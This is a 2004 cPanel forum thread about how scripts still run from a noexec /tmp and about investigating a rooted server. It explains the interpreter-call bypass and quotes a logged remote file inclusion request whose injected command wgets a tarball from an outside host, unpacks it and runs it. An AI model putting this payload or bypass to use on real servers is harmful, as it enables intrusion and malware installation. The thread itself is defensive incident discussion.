Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

How to execute a file in a noexec tmp/?

Discussion in 'General Discussion' started by mikehvvc, Sep 12, 2004.

  1. mikehvvc

    mikehvvc Registered
    PartnerNOC

    Joined:
    Apr 27, 2004
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    151
    Hello,

    I recently read a post saying it was possible for someone to execute a file in a noexec /tmp, so is this possible if so how? Thanks.



    -Mike
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Yes, it's simple.

    For example, if you copy a perl script to /tmp with noexec enabled, then this won't work:

    /tmp/script.pl

    but, this will:

    perl /tmp/script.pl

    The same goes for shell scripts, for example this won't work:

    /tmp/script.sh

    but this will:

    sh /tmp/script.sh

    It becomes only slightly more difficult with binaries in /tmp, but all you have to do is write a shell wrapper and you can then use the above.

    So, it's not much of a protection, but it is one layer in your server security structure.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. mikehvvc

    mikehvvc Registered
    PartnerNOC

    Joined:
    Apr 27, 2004
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    151
    Chirpy,

    Thank you for your reply. The reason I asked about this is for I had a box get rooted for the second even when I locked down tmp/. Not that locking tmp/ will solve all security issues with a box, but they seem to have run the same type of exploit as before. They installed an irc app (psybnc) and other misc binaries in tmp/. I am new in investigating such matters, so if anyone has any pointers on how to track down how they got it, please let me know. I log in varies log files and seen that they down an portscan of some type. It ain't no nmap I will tell you, lol. Here is a want I found when I do a "grep wget /usr/local/apache/domlogs/* "

    /usr/local/apache/domlogs/domain.com:ip address- - [09/Sep/2004:07:21:42 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.somedomain.biz/b?&cmd=cd%20/dev/shm;wget%20www.somedomain.or/alexander/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 558 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iOpus-I-M)"

    Anyways, if anyone have more tips on how to investigate a hack let me know. Thanks.



    -Mike
     
  4. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,366
    Likes Received:
    5
    Trophy Points:
    168
    cPanel Access Level:
    Root Administrator
  5. kris1351

    kris1351 Well-Known Member

    Joined:
    Apr 18, 2003
    Messages:
    963
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Lewisville, Tx
    mod_security helps with the perl scripts running like that I believe.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice